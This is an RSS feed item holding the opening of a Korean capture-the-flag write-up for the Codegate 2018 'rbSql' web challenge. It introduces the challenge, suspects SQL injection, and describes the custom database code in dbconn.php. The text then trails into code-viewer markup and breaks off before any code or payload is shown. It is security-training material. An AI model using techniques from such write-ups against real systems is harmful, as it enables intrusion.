<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
  <channel>
    <title>choiys</title>
    <link>https://choiys.tistory.com/</link>
    <description>hi</description>
    <language>ko</language>
    <pubDate>Sat, 9 May 2026 15:46:01 +0900</pubDate>
    <generator>TISTORY</generator>
    <ttl>100</ttl>
    <managingEditor>Choiys</managingEditor>
    <item>
      <title>[Codegate 2018 Qualifier] Web &amp;ndash; rbSql</title>
      <link>https://choiys.tistory.com/entry/Codegate-2018-Qualifier-Web-%E2%80%93-rbSql</link>
      <description>&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;&lt;strong style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot;&gt;[Codegate 2018] WEB – rbSql&lt;/strong&gt;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif; text-align: center; clear: none; float: none;&quot;&gt;&lt;span class=&quot;imageblock&quot; style=&quot;display: inline-block; width: 620px;  height: auto; max-width: 100%;&quot;&gt;&lt;img src=&quot;https://t1.daumcdn.net/cfile/tistory/99623F405C6774C90B&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F99623F405C6774C90B&quot; width=&quot;620&quot; height=&quot;259&quot; filename=&quot;1.png&quot; filemime=&quot;image/jpeg&quot; style=&quot;&quot;/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;해당 문제는 소스를 공개하는 오픈소스 형태의 문제입니다. 가장 먼저 문제 페이지에 접속해보면..&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif; text-align: center; clear: none; float: none;&quot;&gt;&lt;span class=&quot;imageblock&quot; style=&quot;display: inline-block; width: 900px; text-align: center;; height: auto; max-width: 100%;&quot;&gt;&lt;img src=&quot;https://t1.daumcdn.net/cfile/tistory/991093405C6774C907&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F991093405C6774C907&quot; width=&quot;900&quot; height=&quot;715&quot; filename=&quot;2.png&quot; filemime=&quot;image/jpeg&quot; style=&quot;text-align: center;&quot;/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;ㅗㅜㅑ… 익숙한 페이지가 눈 앞에 나타납니다. 최근 몇년간의 국내 CTF를 참가해 웹 분야의 문제를 풀어보았다면 많이 봤을 크리스탈입니다. 딱 봤을 때 있는 기능이라면 Photo와 M/V가 있으며, Join과 Login 기능이 존재합니다. 문제 이름에 SQL이 들어가기 때문에 SQL Injection이라고 생각되지만, 자세한 것은 소스코드를 확인해봐야 알 것 같습니다.&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;문제 설명에 첨부되어있는 파일을 다운받아 압축을 해제하면 크게 두가지 메인 소스코드로 나뉘어져 있다는 것을 알 수 있습니다.&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;&lt;strong style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot;&gt;index.php&lt;/strong&gt;와&amp;nbsp;&lt;strong style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot;&gt;dbconn.php&lt;/strong&gt;입니다.&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;일반적으로 dbconn.php에는 해당 웹서버에서 사용하고 있는 데이터베이스에 대한 설정(아이디, 패스워드, 호스트, 포트, 사용할 DB명 등)을 담고 다른 페이지에서 import하여 사용하는 형태이지만, 이 문제는 달랐습니다. rbSql이라는 제목이 허투루 나온 것이 아니라 출제자 본인이 직접 생각하여 구현한 데이터베이스 형태인 것 같습니다. dbconn.php 내에는 저장할 데이터에 대한 파싱 방법, 패킹 방법, 그리고 데이터를 삽입/삭제/조회할 수 있는 기능들을 구현해 놓았습니다.&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;다음은 index.php와 dbconn.php의 소스코드입니다.&lt;/p&gt;&lt;div id=&quot;crayon-5c677473e1a5a263262138&quot; class=&quot;crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-pc print-yes notranslate&quot; data-settings=&quot; minimize scroll-mouseover&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; text-size-adjust: none; width: 750px; padding: 0px; margin: 12px 0px; font-family: Monaco, MonacoRegular, &amp;quot;Courier New&amp;quot;, monospace; color: rgb(60, 72, 88); height: auto; overflow: hidden !important; position: relative !important; direction: ltr !important; border: 1px solid rgb(222, 222, 222) !important; background-color: rgb(248, 248, 255) !important; font-size: 12px !important; line-height: 15px !important;&quot;&gt;&lt;div class=&quot;crayon-plain-wrap form-group&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; position: relative; background: 0px center; border: 0px; margin: 0px !important; padding: 0px !important; height: auto !important;&quot;&gt;&lt;textarea wrap=&quot;soft&quot; class=&quot;crayon-plain print-no form-control&quot; data-settings=&quot;dblclick&quot; readonly=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; color: rgb(0, 0, 0); font-style: inherit; font-variant: inherit; font-stretch: inherit; margin: 0px 0px 7px; overflow: hidden; max-width: 100%; padding-top: 0px; padding-right: 5px; padding-left: 5px; display: block; width: 748px; height: 0px; background: linear-gradient(rgb(156, 39, 176), rgb(156, 39, 176)) center bottom / 0px 2px no-repeat, linear-gradient(rgb(210, 210, 210), rgb(210, 210, 210)) center calc(100% - 1px) / 100% 1px transparent; border-width: 0px; border-style: initial; border-color: initial; border-radius: 0px; box-shadow: none; transition: background 0s ease-out 0s; float: none; vertical-align: middle; resize: none; position: absolute; opacity: 0; white-space: pre; overflow-wrap: normal; tab-size: 4; z-index: 0; font-size: 12px !important; line-height: 15px !important; font-family: Monaco, MonacoRegular, &amp;quot;Courier New&amp;quot;, monospace !important;&quot;&gt;&lt;/textarea&gt;&lt;/div&gt;&lt;div class=&quot;crayon-main&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; background: 0px center; border: 0px; padding: 0px; margin: 0px; width: 748px; overflow: hidden; position: relative; z-index: 1;&quot;&gt;&lt;table class=&quot;crayon-table&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-size: 18px; margin-left: 0px; border-collapse: collapse !important; border-spacing: 0px !important; background: none !important; width: auto !important; border: none !important; padding: 0px !important; margin-right: 0px !important; margin-bottom: 0px !important; margin-top: 0px !important; table-layout: auto !important;&quot;&gt;&lt;tbody style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot;&gt;&lt;tr class=&quot;crayon-row&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; background: 0px center; border: none !important; padding: 0px !important; vertical-align: top !important; margin: 0px !important;&quot;&gt;&lt;td class=&quot;crayon-nums &quot; data-settings=&quot;show&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; padding: 0px !important; vertical-align: top !important; font-family: Monaco, MonacoRegular, &amp;quot;Courier New&amp;quot;, monospace !important; border: 0px; margin: 0px !important; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important;&quot;&gt;&lt;div class=&quot;crayon-nums-content&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; background: 0px center; border: 0px; padding-right: 0px; padding-left: 0px; margin: 0px; white-space: nowrap; padding-top: 5px !important; padding-bottom: 3px !important; font-size: 12px !important; line-height: 15px !important;&quot;&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-1&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;1&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-2&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;2&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-3&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;3&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-4&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;4&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-5&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;5&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-6&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;6&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-7&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;7&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-8&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;8&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-9&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;9&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-10&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;10&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-11&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;11&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-12&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;12&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-13&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;13&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-14&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;14&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-15&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;15&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-16&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;16&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-17&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;17&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-18&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;18&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-19&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;19&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-20&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;20&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-21&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;21&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-22&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;22&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-23&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;23&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-24&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;24&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-25&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;25&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-26&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;26&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-27&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;27&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-28&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;28&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-29&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;29&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-30&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;30&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-31&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;31&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-32&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;32&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-33&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;33&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-34&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;34&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-35&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;35&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-36&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;36&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-37&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;37&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a5a263262138-38&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: 